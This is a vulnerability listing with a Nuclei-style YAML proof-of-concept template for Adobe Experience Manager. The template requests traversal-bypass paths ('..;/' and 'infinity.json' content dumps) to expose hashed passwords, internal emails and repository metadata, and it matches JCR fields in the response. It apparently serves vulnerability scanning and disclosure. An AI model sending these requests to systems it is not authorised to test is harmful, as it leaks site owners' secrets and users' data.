漏洞描述
Possible Juicy Files can be discovered at this endpoint. Search / Grep for secrets like hashed passwords ( SHA ) , internal email disclosure etc.
aem-secrets: AEM Secrets - Sensitive Information Disclosure
PoC代码[已公开]
id: aem-secrets
info:
name: AEM Secrets - Sensitive Information Disclosure
author: boobooHQ,j3ssie
severity: high
description: |
Possible Juicy Files can be discovered at this endpoint. Search / Grep for secrets like hashed passwords ( SHA ) , internal email disclosure etc.
reference:
- https://www.linkedin.com/feed/update/urn:li:activity:7066003031271616513/
metadata:
verified: true
max-request: 2
tags: aem,adobe,misconfig,exposure,vuln
http:
- method: GET
path:
- "{{BaseURL}}//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json"
- "{{BaseURL}}/..;//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json"
headers:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US,en;q=0.9,hi;q=0.8
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"jcr:uuid"'
- '"jcr:createdBy"'
- '"uri"'
condition: and
- type: word
part: header
words:
- application/json
- type: status
status:
- 200
# digest: 4b0a00483046022100b0a60cfafd4658710b1c380aeabe40e2e83534c71ce61793b4ae0072ffe23da0022100b5e1c96ce0c878453e32f1c91963aef86fe8021825812d2037ff5e3da3aa4021:922c64590222798bb761d5b6d8e72950